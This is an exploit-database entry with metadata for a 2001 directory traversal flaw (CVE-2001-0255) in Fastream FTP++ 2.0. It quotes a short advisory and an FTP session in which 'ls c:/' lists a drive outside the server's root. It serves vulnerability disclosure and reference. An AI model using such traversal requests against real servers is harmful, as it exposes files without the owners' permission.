fastream ftp++ 2.0 - Directory Traversal

Author: SNS Research
type: remote
platform: windows
port: 
date_added: 2001-01-22  
date_updated: 2012-08-17  
verified: 1  
codes: CVE-2001-0255;OSVDB-12103  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 20584.txt  

source: https://www.securityfocus.com/bid/2267/info

It is possible for a remote uesr to gain read permissions outside of the Faststream FTP++ Server directory. By requesting an 'ls' command along with the drive name, Fastream FTP++ will disclose the contents of the requested drive.

ftp> pwd
257 "/C:/FTPROOT/" is current directory.
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.

(listing of c:\)